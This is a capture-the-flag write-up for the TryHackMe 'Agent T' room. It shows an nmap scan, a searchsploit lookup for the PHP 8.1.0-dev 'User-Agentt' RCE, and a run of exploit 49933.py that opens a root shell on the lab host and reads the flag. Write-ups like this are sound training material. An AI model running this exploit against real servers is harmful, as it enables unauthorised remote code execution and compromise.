CTF : Agent T

CTF Agent T writeup. Source THM. Announced difficulty level: Easy

Posted by Boula-Bytes on 24 August 2022

CTF : Agent_T

Informations

  • IP: 10.10.73.168
  • MYIP: 10.9.85.5

First enumeration

Basics

  • NMAP
console
$ sudo nmap -p80 -A 10.10.73.168
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-24 14:43 CEST
Nmap scan report for 10.10.73.168
Host is up (0.040s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    PHP cli server 5.5 or later (PHP 8.1.0-dev)
|_http-title:  Admin Dashboard
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 443/tcp)
HOP RTT      ADDRESS
1   37.75 ms 10.9.0.1
2   38.12 ms 10.10.73.168

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.38 seconds

Vulnerabilities search

As we can see with nmap this server uses php 8.1.0-dev

console
$ searchsploit php 8.1.0-dev
------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                       |  Path
------------------------------------------------------------------------------------- ---------------------------------
[...]
PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution                                  | php/webapps/49933.py
[...]
------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Okay ! This version of php leads to an RCE, let's try it.

Exploit

console
$ python3 49933.py
Enter the full host url:
http://10.10.73.168

Interactive shell is opened on http://10.10.73.168 
Can't acces tty; job crontol turned off.
$ ls
404.html
blank.html
css
gulpfile.js
img
index.php
js
package-lock.json
package.json
scss
vendor

$ id
uid=0(root) gid=0(root) groups=0(root)

$ cat /flag.txt

\o/